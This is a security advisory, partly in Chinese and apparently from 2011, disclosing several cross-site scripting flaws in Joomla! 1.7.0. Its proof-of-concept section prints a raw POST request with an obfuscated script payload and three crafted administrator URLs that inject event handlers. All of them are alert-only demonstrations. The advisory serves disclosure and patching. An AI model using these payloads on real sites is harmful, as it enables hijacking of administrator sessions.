Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities

 

1. 概述

 

Joomla! 1.7.0 (stable version) 含多个xss

 

2. 背景

 

Joomla is a free and open source content management system (CMS) for

publishing content on the World Wide Web and intranets. It comprises a

controller (MVC) Web application framework that can also be

used independently.

Joomla is written in PHP, uses object-oriented programming (OOP)

techniques and software design patterns, stores data in a MySQL

database, and includes features such as page caching, RSS feeds,

printable versions of pages, news flashes, blogs, polls, search, and

support for language internationalization.

 

3.缺陷描述

 

Several parameters (searchword, extension, asset, author ) in Joomla!

Core components are not properly sanitized upon submission to the

/index.php url, which allows attacker to conduct Cross Site Scripting

attack. This may allow an attacker to create a specially crafted URL

that would execute arbitrary script code in a victim's browser.

 

4. 影响版本：<=1.7.0

 

5. PROOF-OF-CONCEPT/EXPLOIT

 

component: com_search, parameter: searchword (Browser: IE, Konqueror)

=====================================================================

 

[REQUEST]

POST /joomla17_noseo/index.php HTTP/1.1

Host: www.2cto.com

Accept: */*

Accept-Language: en

User-Agent: MSIE 8.0

Connection: close

Referer: http://www.2cto.com /joomla17_noseo

Content-Type: application/x-www-form-urlencoded

Content-Length: 456

 

task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(

String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,10

1,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,11

6,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,11

6,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromC

harCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssss

ssssss&option=com_search

[/REQUEST]

 

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

User Login is required to execute the following XSSes.

 

Parameter: extension, Component: com_categories

====================================================

 

http://www.2cto.com /joomla17_noseo/administrator/index.php?option=com_categ

ories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style

=%22width:3000px!important;height:3000px!important;z-index:999999;positi

on:absolute!important;left:0;top:0;%22%20x=%22

 

Parameter: asset , Component: com_media

====================================================

 

http://www.2cto.com /joomla17_noseo/administrator/index.php?option=com_media

&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmous

eover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000p

x!important;z-index:999999;position:absolute!important;left:0;top:0;%22x

=%22&author=

 

Parameter: author, Component: com_media

====================================================

 

http://www.2cto.com /joomla17_noseo/administrator/index.php?option=com_media

&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%

20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;heig

ht:3000px!important;z-index:999999;position:absolute!important;left:0;to

p:0;%22x=%22

 

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

6. IMPACT

 

Attackers can compromise currently logged-in user/administrator

session and impersonate arbitrary user actions available under

/administrator/ functions.

 

7. 解决方案

 

升级到更高版本

 

8. VENDOR

 

Joomla! Developer Team

http://www.joomla.org

 

#yehg [2011-09-29]